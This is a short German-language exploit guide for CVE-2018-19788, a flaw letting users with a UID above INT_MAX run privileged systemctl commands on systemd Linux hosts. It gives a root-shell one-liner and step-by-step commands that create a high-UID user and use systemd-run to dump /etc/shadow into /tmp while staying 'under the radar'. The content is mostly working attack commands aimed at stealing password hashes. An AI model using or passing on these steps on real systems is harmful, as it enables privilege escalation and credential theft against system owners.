
Ausnutzen von CVE-2018-19788 ohne Root-Shells
CVE-2018-19788 ist ein Problem, bei dem jeder Benutzer mit einer UID über INT_MAX (also 4000000000) jeden systemctl-Befehl auf einem systemd-Linux-Rechner wie Ubuntu ausführen kann. (Es gibt bereits eine Anleitung, um eine Root-Shell zu erlangen: hier). Der Hauptunterschied zwischen dieser Anleitung und der vollständigen Root-Shell-Anleitung besteht darin, dass dies als der Benutzer selbst anstatt als Root-Benutzer ausgeführt wird (eigentlich nur ein PoC, um ehrlich zu sein).
Um eine Root-Shell zu erhalten, reicht es einfach systemd-run -t /bin/bash auszuführen, aber wenn Sie unter dem Radar bleiben möchten, können Sie einfache Befehle ausführen, um privilegierte Dateien ohne Terminal zu erhalten. Befolgen Sie diese Schritte:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp:
cat /tmp/results_poc.txt